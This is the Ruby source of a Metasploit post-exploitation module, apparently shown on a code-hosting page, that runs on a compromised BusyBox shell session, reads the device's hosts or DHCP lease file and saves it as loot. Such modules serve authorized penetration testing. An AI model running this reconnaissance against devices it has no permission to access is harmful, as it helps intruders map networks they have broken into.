Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Linux::BusyBox
9

10
  def initialize
11
    super(
12
      'Name' => 'BusyBox Enumerate Host Names',
13
      'Description' => %q{
14
        This module will be applied on a session connected to a BusyBox shell. It will enumerate
15
        host names related to the device executing BusyBox.
16
      },
17
      'Author' => 'Javier Vicente Vallejo',
18
      'License' => MSF_LICENSE,
19
      'Platform' => ['linux'],
20
      'SessionTypes' => ['shell']
21
    )
22
  end
23

24
  def run
25
    print_status('Searching hosts files...')
26
    if busy_box_file_exist?('/var/hosts')
27
      hosts_file = '/var/hosts'
28
    elsif busy_box_file_exist?('/var/udhcpd/udhcpd.leases')
29
      hosts_file = '/var/udhcpd/udhcpd.leases'
30
    else
31
      print_error('Files not found')
32
      return
33
    end
34

35
    read_hosts_file(hosts_file)
36
  end
37

38
  def read_hosts_file(file)
39
    str_file = read_file(file)
40
    print_good("Hosts file found: #{file}.")
41
    vprint_line(str_file)
42
    p = store_loot('busybox.enum.hosts', 'text/plain', session, str_file, file, 'BusyBox device host names')
43
    print_good("Hosts saved to #{p}.")
44
  rescue EOFError
45
    print_error("Nothing read from file: #{file}, file may be empty.")
46
  end
47
end
48

49